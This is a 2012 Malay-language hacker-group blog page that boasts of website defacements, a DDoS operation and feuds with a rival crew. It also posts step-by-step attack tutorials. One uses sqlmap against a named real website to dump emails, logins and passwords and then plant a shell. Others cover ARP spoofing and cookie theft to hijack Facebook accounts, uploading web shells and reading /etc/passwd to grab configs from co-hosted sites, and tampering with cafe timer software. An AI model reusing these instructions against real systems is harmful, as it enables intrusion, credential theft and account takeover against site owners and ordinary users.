Saturday, 25 August 2012

[MACHO ATTENTION] We Are Back!!

Assalamuailaikumm!!!,

maaflah memang lama kami tidak dapat berhubung dengan anda semua! :D ,,ini domain baru kami..simple jer dan FREe..kami dah takleh acces domain free intuit.mereka dah update security mereka...Brutal FORCE daripada CDC team bagi domain ini..terima kasehh :D kepada beliauuu...sayang Bforce <3 <3  huhahha

domain lama kami tengah berada di perbincangan..kalau diizin tuhan mungkin kami menggunakan domain lama itu..huhu..sepanjang kami proses dalam membina domain baru banyak..tok imam dengar macam2.. blog macho kena hack la..tu la..hahaha..semua tu adalah berita ingin mendapatkan backlinks yang tinggi..saper taknak buat article tntang kami :D ,,

blog ini masih 80% pulih..blog macho mengalami sedikit kerosakan code!,,atas aper ntah..hadoii letih la plak,,kena FIX code baleq...ok stakat itu saja daripada kami...

WE ARE BACKK!!!!

Read More-

Monday, 20 August 2012

[MACHO BERITA] OP Free Assange#

Assalamuailaikum,semalam berjalannya satu OP yang amat penting tentang kebebesan pemilik WIKILEAK tak lain tak bukan Julian Assange yang ditangkap!,

semalam  pukul 3.00 pagi start nya OP itu,dan daripandangan kami OP itu berjalan dengan Lancar!,

3site telah DOWN akibat DDOS TOOL anon..huhu..melalui PASTEHTML yang power!,

ini gambar :

Tapi pagi tadi hingga pukul 6 semua itu masih DOWN.sekarang dah UP balek,

dan satu site kena HACKED oleh Anonymous untuk Kebebasan Julian

http://primavi.se/


itu saja daripada kami ,





Read More-

[Macho Hacking]Pentest Site Dgn Python




Assalamualaikum, anda puas beraya di hari yg kedua? mestilah puaskan, ni Xe ade tutorial sikit.
Pesntest sesebuah site menggunakan python, untuk mencari vuln di sesebuah site.

barang yang anda perlukan :
1.Python (http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi
2. Cmd (command prompt)
Ok mari kita mulakan
disini saya test site ini :www.kaltimpost.co.id
saya menaip root.py -sqli www.kaltimpost.co.id
contoh gambar dibawah
dan hasil nya seperti di bawah ini, akan ada file flashjumper.txt di folder ( pandai pandai la korg cari ye :P)
dpt vuln

dan begitulah hasilnya
jika ingin source file python ni ha : http://pastebin.com/AWr0tTD0
salam dari saya X3


Read More-

Sunday, 19 August 2012

[Macho Hacking]SqlMap Tutorial

(gambar hanyalah hiasan)
Assalamualaikum semue. harini eden nk wat tuto sqlmap yg lebih pantas mengorek database untuk sesebuah site yg vuln


Ok jom start Sblom tue, barang2 yang perlu korang ade

1-Python 2.7 (http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi)
2-Sqlmap (http://sqlmap.sourceforge.net/)
3-CMD (same jea dgn command prompt)
4-vuln website

Okei,bila dah siap download,korang install Python 2.7
Kemudian,korang "cut" folder sqlmap dan "paste" kan lam local disk (c:)

Ok siap!

1.Sekarang buka cmd,untuk kali nie saye akan menggunakan vuln website berupa nie

http://www.mmbuildings.com/newsitem.php?id=61

2.Ok skarang di cmd buka dan type

CD/ dan enter

3.kemudian korang taip

"cd sqlmap" dan tekan enter

note:tanpa quatations ""

4.korang taip lam cmd

sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61

5.ok skarang kalau mengikut website yang saye pilih tady akan kluar due option iaitu Y/N

ok type N

6.Korang type lam cmd tu

sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 --dbs

note:
kalau anda ikut step by step anda sepatutnya akan dapat database Database yang saye dapat berupa *mm_mm *information_schema <-------yang nie kite ta nak Jadi kite akan pilih mm_mm <----

Macamne kite na pilih??

7.Type nie

sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm --tables

Tunggu sehingga cmd selesai mengescan website tersebut,untuk mengelakkan kebosanan,boleh bukak new tab dan layan porn *astagar* xD

8.Selesai Scan,korang akan nampak "Tables/meja"

Jadi skarang saye akan pilih tables account (ingat setiap website mempunyai tables yang berlainan)

Type dalam cmd

sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --columns

Bila selesai scan,akan nampak 3 columns iaitu email id login access dan password! :D

9.Okei,sekarang aku akan ambil ketiga2 columns tu...sekarang type ni pulokk

sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --dump

10.Akan tertera email,id login & passwords...okei,sekarang,korang leh cari admin login untuk mengakses ke site tersebut & kemudian tanam shell (untuk blackhat) atau tinggal jejak (untuk pinkhat)

untuk memudahkan korang mencari admin login....korang bleh menggunakan perl

note:boleh pelajari disini

http://www.reaperzhacking.com/2012/02/tuto-cari-admin-login-page.html

sekian,terimakasih :D

p/s:tuto ni diambil dari group silent hacker crew kemudian diolah 70% untuk memudahkan korang membaca serta enjoy tuto kali ini....

Regards,
Pegawai Waran & Xe Phc

Created by X3 Phc
Read More-

[MACHO ATTENTION] Penipuan Dragon Force?

Assalamuailaikum,selamat hari raya yer semua, ^_^ ,hari ini pihak kami ingin bongkarkan seberapa banyak penipuan selama ini yang dilakukan oleh Si Nobber Malaysia ini,dah tidak lain dan tidak bukan,mestilah Dolden Force :P,

Mula-mula kami ingin bukakan satu cerita tentang produk http://myscammer.df.my/ kena HACK oleh Kami MACHO CYBERCRIME ^_^,tapi pihak Dolden Force menafikannya dengan memberitahu itu bukannya site diorang,huhu, dan diorang kata ini site baru --> http://www.myscammer.df.my ,dan kedua-dua site takleh guna,wakaka,memang bangang la DF niem, ini screen shot yang mereka nafikannya :;


King alexander adalah IluvMypensil

Dah selesai cerita pertama nampak tak penipuan DoldenForce kepada RakYAT Malaysia??,kata DF milik MALAYSIA,tapi kenapa Tipu Rakyat Malaysia xD,nampak??

Cerita kedua, :D ,ingat lagi tak 2hari lepas page DF kena HIJACKED oleh Chinese Team,huhu :D,engat tak? ,kalau tak engat boleh singgah sini --> Tekan untuk ke Berita ,dah engat?Mereka dah kena Hijacked oleh Chinese Team,rasa tak malu ker?dan sekali lagi mereka ingin gunakan taktik yang sama,iaitu untuk DELETE page Mereka,mereka nak delete melalui cara ''REPORT'' tapi hacker china tak sebodoh macam diorang,China Team HIDE dulu buat seketika Page DOLDENFORCE yang kena HACK,biar noob-noob DF takleh report,nampak kan permainan DRAGONFORCE yang macam kanak-kanak?,memalukan CYBERCRIME di MALAYSIA betul,
ini bukti mereka anjur untuk report page mereka sendiri,demi menjaga nama baik konon :P

gunakan motto macho ayie takleh tahan :P,

nampak permainan mereka,KALAU PAGE TU DOWN,diorang akan bina page baru balik :D,dan buat-buat tak tahu jer diorang dah kena HACK.hukx2,,page lama yang mengandungi 20k likers dah kena DOWNKAN oleh MENTERI FASOLA,MACHO AYIE dan TOK IMAM :D,


Ini cerita terakhir kami, :D,pada Malam Ahad Hari Sabtu pukul 4.30 pagi,sekali lagi malapetaka menimpa kepada crew-crew DOLDEN FORCE, :3 ,BLOG YANG DIORANG agung-agungkan telah pom digodam oleh penggodam bernama Macho Ayie dan Tok Imam daripada Macho Secret Team,DF  tak sempat mandi SUNAT raya lagi,wakaka,dah kena hacked tak tahu berita? KLIK UNTUK BERITA!..tapi kali ini taktik mereka hampir serupa dengan taktik cerita yang kami ceritakan di MULA-MULA tadi,mereka hanyalah menukarkan DNS bagi Blog diorang jadi kita semua dah takleh tngok BLOG diorang,nanti kami jumpa ping DNS,kami kasitau,tujuan diorang TUKAR DNS blog adalah bagi semua orang ingat blog tu dah kena DELETE,dan juga,ramai rakyat-rakyat Malaysia tidak tahu mereka DIGODAM,wakakka,nampak permainan dia??,itulah NOOB FORCE!,lepasni tengoplah apa plak yang digodam! :D ,dan kita pula boleh tengok apakah taktik terbaru diorang?kan IluvMyPensil ?,haha




Read More-

Saturday, 18 August 2012

[MACHO ATTENTION] Mydefacer Kena Hijack Oleh MachoCyb3rs3c

Dragon Force hacker berstatus ''SURAT khabar harian metro'' sekali lagi kena HACKED,memang tak cukup lagi,haritu  site diorang yang boleh CHAT sambil dengar radio,kena Hacked,LEpas itu,Produk myscammer df pula kena HACK,and then PAGE diorang plak kena HACKED,,sekarang Mydefacer pula kena HACKED,memang FuckenFolce ini jatuh ditimpa Eskalator laa,berapa kali dah kena HACKED


Nasihat saya kepada FuckenFOLCE baik kamu bersara la,malukan malaysia jer ada team hacker cam korang,dah la bajet pro,gilaa pemes lak tu,, haktuihhh laa :P ,PUBLISTI yang korag idam-idamkan bukan leh wak masuk dalam KUBUR pom!,sekarang kan dah kena BALA,,padam muka ingat NOSYTEM IS PERFECT,

ini sedikit screenshoot Mydefacer kena HACKED!



Macam maner la plak.FUCKENFOLCE niem sokong Macho Cyb3rcrim3,kami dengar benci sangadd,kpada kami,w,akakaka :D

ini lagi :



Nasihat kami kepada DF,bubar jerla TEAM HAPRAK koran tu,betul kami kater,korang hanyalah reti MALUKAN MALAYSIA cybercrime jer!,


bak kata tok imam 

''Kalau baru reti ''CRACK IDM'' jangan adakan CyberWar dngn Kami''
''Kalau Imlu DIDADA tak cukup,jngn pernah KUTUK kami''



Read More-

[MACHO SECRET] Macho Ayie IS Back !

Owh,kami menerima berita tergempar untuk disiarkan kepada anda semua,lovers-lovers,readers-readers,macho blog,sedar tidak sedar,kita dah raya,sedar tak sedar juga ada berlaku DEFACEMENT di website PORN,mungkin anda semua dah tahu saper yang lakukan kan?memang dah tak laen tak bukan dia Macho Ayie,dia juga  HACK 7 Site PORN kalau tak silap semasa dia tak RETIRED,dan menukarkan paparan asal kepada paparan zikrullah! :D,Oh MACHO,kamu membuat 1MALAYSIA bangga dengan kamu,

Nak diterusan berita kami menerima sebanyak 30 site dan 1 site Malaysia yang kena HACK!,,kami juga amat terkejut,ini screenshot site yang kena HIJACKED oleh MACHO AYIE~

bukti :
 Memang tiada dah DEFACEMENT yang lucu macam ini,dah tiada orang laen Macho Ayie jer~,dia mengucapkan SELAMAT  HARI RAYA ~
dan ini site PORNO,

memang dah tiada SCRIPT DEFACEMENT ini hanyalah ada pada MACHO AYIE sorang.
dan untuk makluman juga try korang tekan link ini --> Tekan! ,
adalah itu satu HACK yang betul ataupun TRICK semata-mata,hurm,sendirilah kamu tanya tuan punya website.



Dan ini juga membuatkan semua Hackers-Hackers Malaysia tertanya,adakah Macho Ayie Back?betul ke dia back?kalau duk ikut biasa dia hack site dan dia kata back~?

itu sudah semesti nyer berada dalam kotak Pemikiran kamu,tapi kami menyifatkan Macho Ayie Hanyalah datang untuk mengucapkan SELAMAT HARI RAYA~,~ ,
kami mewakili Macho ayie untuk meminta maaf jikalau ada tersilap BAHASA,KENAHACK oleh dia,itu saja,selamat hari raya MAAF ZAHIR DAN BATIN~ :D ,



Anda mahu menjadi REPORTER untuk Blog Kami!,Gaji RM100 Sebulan!~,berminat?boleh emaik ke machocybercrime@gmail.com, :D




Read More-

[MACHO ATTENTION] Kami DiTemu Bual

Owh selamat pagi,dan selamat Hari raya,di pagi yang cantik dan mulia ini,kami diberi salam oleh wartawan SetanStyliz,dia ingin menemuramah kami,jadi sedangkan kami FREE,kami teruskan jela agenda TERSEBUT!,

nak tahu aper perbualan kami ?  klik link ini --->>000--> Tekan ini,
Read More-

[MACHO ATTENTION] Selamat Hari Raya!

Assalamuailaikum kepada semua readers,yang dikasihi,kami ingin memohon maaf di aidilFITRI ini,kami juga meminta maaf kepada semua WEBSITE ADMIN yang pernah kaMi HACK,dan semua crew2 di MALAYSIA ini itu jer :D


SELAMAT HARI RAYA,MAAF ZAHIR DAN BATIN :D
Read More-

Friday, 17 August 2012

[MACHO INFO] Page Dragon Force ''DELETED''

Selamat pagi dan selamat bersahur untuk terakhir kepada warga pembaca Macho cyb3rcrime,
pihak kami mendapat email,yang bahawasanya,page Dragon Force didelete,jadi kami hairan @@,kan page DF tu dah kena HACK  oleh  China?kan>?,takkan mereka nak delete plak!susah2 hack walau hakikat nyer sangad lah senang nak hack DF,wakakak,,

jadi Tok juba nak rungkai sikit,cari punya cari,kemungkinan HACKER yang menawan page LAMMER tu dia hide kan  buat sementara kerana ADMIN df ader lancar satu OP nak report page biarkan DOWN buat selama-lamanya,barulah tak tercalar nama DF status ''HACKER HARIAN HMETRO'' kan?,mesti korang mahu bukti nih tok nak bagi bukti

:

wakaakak,kesiannyer,dah la kena HACK,skang nak DOWNKAN page sendiri memang crew korang xkan dpat nama di hati MALAYSIA!,

jadi disitu lah HACKER yang dapat menawan page lammer tadi,HIDE KAN PAGE ITU buat sementara, :D ,memang berfikiran jauh gak,hacker niem.,

NO SYSTEM IS PERFECT 


Read More-

[MACHO BERITA] FANPAGE Dragon Force Digodam Pula?

Team Hacker Berstatus ''SuratKhabarHarianMetro'' sekali lagi ditimpa bala apabila page diorang digodam oleh Chinese Hacker Team,

menurut sumber daripada page Dragon Force sendiri,pihak kami melihat,Timeline Cover Photos Telah bertukar kepada gambar JuON yg mahu keluar daripada skren komputer,

gambar :


Pihak kami amat berbangga yer terhadap GODAMAN yang berlaku kepada PAGE DRAGON FORCE,kerana dah lama kami perhatikan crew tersebut sungguh riak dan taksub terhadap publisit,wakka,,sekarang PADAM MUKA MEREKA,Nah jari tengah yang berkat di bulan RAMADAN ini~,~


Godaman ini juga berlaku,baru jer 10 minit tadi,HAHA,

ini antara perbualan Chinese Hacker Team,di page Dolden Porce,wakkaka


Disini pihak Macho Secret Team ingin berpesan kepada Dolden Porce yang PRO tu,jangan terlalu LAPAR PUBLISITI dan nak HACK macam-macm,sehinggakan kamu sendiri ''KENAHACK'',wakaka,

Kami juga dimaklumkan bahawa site df dah kena hack,dan page lama dah kena DOWNKAN oleh Macho Secret Team,dah 2kali bagi pesanan,mereka tak ambil juga,dan kesempatan kali ini adalah pihak kami ingin berpesan kepada DRAGON FORCE,that is NO SYSTEM IS PERFECT! 


credit to :gilerhackers.net dan Abam-abam Macho SECRET team kerana Info kepada kitorang :D



Read More-

Thursday, 16 August 2012

[MACHO HACKING]Hack Facebook Via CookiesStealing

Apa Itu Cookies?

Cookies ialah fail kecil (saiz kecil) yang disimpan di dalam komputer pengguna apabila mereka melawati sesebuah laman sesawang (laman web la tu). Cookies yang disimpan itu akan digunakan oleh web serveruntuk mengenalpasti pengguna tersebut. Contoh yang paling mudah ialah apabila pengguna melawati dan log masuk pada laman Facebook, satu unique string akan dijana, yang mana satu akan disimpan oleh web server, dan satu lagi akan disimpan oleh pelayar (web browser) pengguna komputer sebagai cookies. kedua-duanya akan dipadankan setiap kali pengguna melakukan apa-apa perubahan pada akaunnya.


Jadi, sekiranya kita berjaya mencuri cookies pengguna tersebut dan memasukkannya (inject) ke dalam pelayar yang kita gunakan, maka kita akan dapat meniru identiti pengguna itu supaya dikesan sebagai 'orang yang sama' oleh web server dan kita pasti akan dapat log masuk dengan menggunakan identitinya itu tadi ke dalam akaun yang digunakan pada masa itu. ini dipanggil sebagai Side Jacking. perkara terbaik yang kita dapat dari kaedah ini ialah kita tidak perlukan id pengguna serta kata laluannya kerana kita hanya perlukan cookies sahaja. jadi kaedah ini sebenarnya boleh menggodam hampir apa sahaja akaun pengguna.



Kaedah Hack Facebook Dengan Cookies Stealing:


Apa yang diperlukan:
1. Ettercap atau Cain and Abel.

2. Wireshark (untuk melakukan sniffing & mencuri cookies)

3. Pelayar Firefox dan Add On Cookies Manager <--- digunakan untuk melakukan 'injection' cookies ke dalam pelayar firefox.



Langkah-langkah:


1. Pertama sekali kita perlu melakukan Address Resolution Protocol (ARP) poisoning (juga dikenali sebagai ARP flooding, ARP spoofing atau ARP Poison Routing (APR) ). Untuk itu, anda boleh merujuk kembali entry Mr.Hac yang lepas tentang ini di sini ---> Apa Itu Man In The Middle Attack? dan juga Apa Itu ARP Spoofing?

2. Selepas melakukan ARP poisoning, buka Wire shark, klik butang 'capture' pada menu bar, kemudian pilih 'interface'. Pilih interface anda (biasanya eth0) dan klik 'start capture'.

3. Anda akan dapat lihat paket data akan 'ditangkap' oleh Wire shark. tunggu seketika sehingga sasaran log masuk ke akaunnya.

4. Sementara itu cari alamat IP Facebook.. pergi ke start ---> Run... ---> taipkan cmd ---> kemudian taipkan Ping Facebook.com



5. Masukkan alamat IP Facebook ke dalam filter bar dan klik 'apply'.

6. Kemudian, cari HTTP Get /home.php dan salin kesemua nilai cookies seperti yang ditunjukkan di dalam gambar:



Klik untuk paparan yang lebih jelas

7. Setelah itu buka pelayar Firefox anda dan masukkan cookies tadi ke dalam 'Cookies Manager' seperti yang ditunjukkan dalam gambar dan klik 'save'. (kalau anda menggunakan Firefox terbaru, sila enable-kan menu bar untuk melihat menu 'Tools' kemudian pilih 'Cookies Manager')

8. Sudah inject?? buka laman facebook pada satu tab yang lain, dan...anda sudahpun log masuk ke dalam akaun sasaran!

9. Anda boleh gunakan kaedah yang sama untuk menggodam akaun Twitter, Gmail, dan lain -lain. 


Terimakasih kepada Mr.hac tanpa anda mungkin kami ini tidak ternama! :D







Read More-

[MACHO HACKING] Hack 1000site dengan Hack 1 Site via SymlinkMethod

Salam,symlink adalah site yang berada di bawah kaki xD site yang kita hack,tak faham,tak perlah,laen kali kamu akan Faham, :D,kita teruskan yer

Benda yang anda harus ada :

SCRIPT SHELL WSO

SCRIPT Dz Tool

Script Shell b347k-NEC

Sekarang ni Korg Extract Dulu Dz Tool tu Ke Dalam Folder

Selepas itu korang upload config.dz Ke Server(dalam website)

jangan lupa upload Shell Hijau Dan b374k m1n1 sekali!!

Tgk Gambar kt bwh

Sekarang ni aku dah upload Shell Dan config.dz


Sekarang Rename config.dz kepada config.pl

Dengan menggunakan Shell ye :)

Sekarang bukak Shell hijau tu

Dan klik config.pl

Kemudian Tekan

chmod

Tukarkan 0644 kepada 0755

Dan tekan Enter!

Seperti Gambar Di Bawah


Kemudian Anda Di Kehendaki Membuka shell b374k m1n1
dan klik Eval

Seperti Gambar Di Bawah


Kemudian Akan Munculnya 1 Kotak Yg Besar Dengan command

echo file_get_contents('/etc/passwd');

Skrg ni Anda Di Kehendaki Menekan Butang Go !

Rujuk Di Bawah

maka keluar la

root:x:0:0:root:/root:/bin/bash

dan banyak lagi code keluar :D

Sekarang click dalam kotak tu

dan tekan Ctrl+a Dan Copy Semuanya!


Lepas Dah copy korang bukak config.pl

dan paste kan semua benda ni kedalam kotak yg besar

Manakala kotak yg kecik kat bawah tu korang letak la nama2 korang atau suka hati korang

Dan Tekan Get Config!


Nanti dia akan cakap Done!

Jangan Klik

Click Here To Download Tar File

Tak penting pun 

Nak Tengok kat Mana Config File Tu berada?

Korg ingat tak kat mana korang letak shell korang??

contoh:

site.com/wp-content/plugins/0/config.pl

jadi korang bukak la site.com/wp-content/plugins/0/

kat situ akan terpaparnya config file yg banyak

dalam format txt

contoh?

seperti gambar di bawah:


Apa Yang Anda Perlukan Skrg Hanyalah Login Ke Mysql Database :)

Comand Untuk Reset Password Nanti aku post lain.atau korang boleh GOOGLE :P

Kena Tunggu Je :D
Tutorial Video
Kalau tak FAHAM lagi tak tahulah,Hakx2,credit to Hackers Malaysia dan Atom Mota,tanpa anda,siapalah Artikel ini dimata rakyat pembaca! :D



Hack Facebook dengan Cookies Stealer
Cara Hack Handy timer dekat CC
Teamviewer FULLVERSION hot released!









Read More-

[MACHO HACKING]Cara Hack HandyCafeTimer dekat CC

Salam,selamat raya,Tok nak revealed sikit ilmu yang tok ada sedikit ini,cara nak hack HANDYCAFETIMER,mungkin anda dah dengar kan,software yang selalu CC pasang untuk menentukan MASA untuk bermain dekat CC mereka :D

Software yg perlu anda ada ialah :
TSearch

TSearch, ia adalah sebuah applikasi yang mampu mengubah binary key, hex key didalam sistem komputer. 




Software ini juga,oleh dibuat untuk HACK GAME yang OFFLINE not ONLINE okay, ;)

Langkah kerja:

1- download dan extract.
2- buka Tsearch.exe
3- pilih open process 
4- pilih applikasi yg hendak anda hack (untuk contoh ini Tok guna game Zombie VS Plant) 
5.Langkah seterusnya adalah tengok VIDEO DI BAWAH,haha



Pandai2 lah kamu manipulasi ilmu yang tok ajr ini untuk Hack HANDY CAFE TIMER okay,jangan nak mengharaplan ilmu didepan mata saja :D

sekian,terima kaseh kepada tuan punya Video :D,tanpa anda,Cacat Artikel Kami

Read More-